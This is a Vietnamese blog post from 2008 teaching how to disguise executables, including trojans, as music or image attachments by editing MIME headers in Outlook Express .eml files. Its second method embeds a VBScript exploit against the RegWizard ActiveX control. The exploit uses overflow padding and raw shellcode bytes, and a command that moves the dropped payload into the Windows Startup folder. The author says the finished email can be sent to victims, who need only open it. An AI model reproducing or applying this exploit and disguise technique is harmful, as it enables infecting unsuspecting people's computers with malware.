Jun 10, 2008
106 Views

Đổi *.exe sang *wma, *.JPG

Written by

Chúng ta phải vào Internet Explorer -> Option -> Security Tab, nhấn Custom Level, và (disable) tất cả
chức năng cho phép chạy Script(Nếu không chính máy bạn sẽ bị nhiễm)
Cách 1
+ Đầu tiên cần 2 file để chuyển, ta lấy file nhạc là love.wma và file DPORT.exe
+ Sau đó cần 1 cái Outlook Express (OE). open OE lên, click vào Insert / File Attachmen ….
rồi chọn từng file, từng file một

+ Sau đó save lại bằng cách click File/ Save As rồi đặt tên gì tùy ý. Tôi đặt là email.eml

+ Sau đó click chuộc phải vào file email.eml chọn Open With….rồi chọn 1 trình nào đó để xem như notepad, hay là wordpad. Tôi chọn Wordpad cho dể làm. khi mở bằng Wordpad thì sẽ thấy 1 đống text không … thân thiện tí nào —> Nhức đầu.

+ Đừng để ý đống text đó. bạn kéo thanh trược xuống 1 tí thôi và Cut đoạn này

Content-Disposition: attachment;
filename=”love.wma”

+ Sau đó kéo thanh trược xuống gần cuối trang và tìm đoạn này .rồi Paste đoạn mà Bạn đã Cut ở trên –>OK . thì nó sẽ như thế này.

——=_NextPart_000_0009_01C68142.15277590
Content-Type: application/x-msdownload;
name=”DPORT.EXE”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=”love.wma”
Content-Disposition: attachment;
filename=”DPORT.EXE”

+ tiếp theo Bạn Cut đoạn này

Content-Disposition: attachment;
filename=”DPORT.EXE”

rồi kéo lên trên đoạn ban đầu, rồi Paste vào thì nó sẽ như sau.

——=_NextPart_000_0009_01C68142.15277590
Content-Type: audio/x-ms-wma;
name=”love.wma”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=”DPORT.EXE”

+) OK . sắp xong rồi. Click File/ Save . Sau đó mở cái email.eml lên. Click File / Save Attachments…–> chọn nơi lưu file. –>Close màn hình.

Bi giờ file DPORT.exe không còn là chính nó nũa, nó đã chuyển thành file love.wma rồi, ngược lại file lovel.wma đã chuyển thanh file DPORT.exe.

Xong. Lưu ý là nếu đã chuyển xong rồi mà chạy love.wma ( chính là DPORT.exe) thì chương trình Win media hay trình nghe nhạc nào đó sẽ được thực thi, chứ không phải là ….. gì gì đó nũa

Tại sao : vì nó có đuôi *.wma nên Win sẽ hiểu lầm là file nhạc, và sẽ gọi chương trình tương ứng để run nó –> quá dể hiểu.

Nhưng nến Bạn chạy love.wma trong Dos thì ..OK.

Cách 2

+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu’t Attach (dat ten la file.exe chang han)
+ Save ca’i email na`y ra mot thu muc nao do’ tren o cung.

Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:

Content-Disposition: attachment;
filename=”file.exe”

– Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:

Content-Type: audio/wav;
name=”Ding.wav”
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename=”file.exe”

– Sau do vao phan dinh dang attachement ding.wav ta cat dong Content-ID sau:

Content-ID: <[email protected]>

– dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:

Content-Type: application/x-msdownload;
name=”file.exe”
Content-Transfer-Encoding: base64
Content-ID: <[email protected]>

– Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no’ , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no’, dung luong cua no’=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no’, chon Remove.

– Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:

<object classid=”clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00″
id=”RegWizObj”></object>
<script language=”VbScript” >

expstr = “/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA”

expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + “move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe”

RegWizObj.InvokeRegWizard(expstr)

</script>

– Save su thay doi vua roi lai. The la xong, ban co the gui no’ di cho cac victim duoc roi day, chi can victim mo la xong

Article Tags:
·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/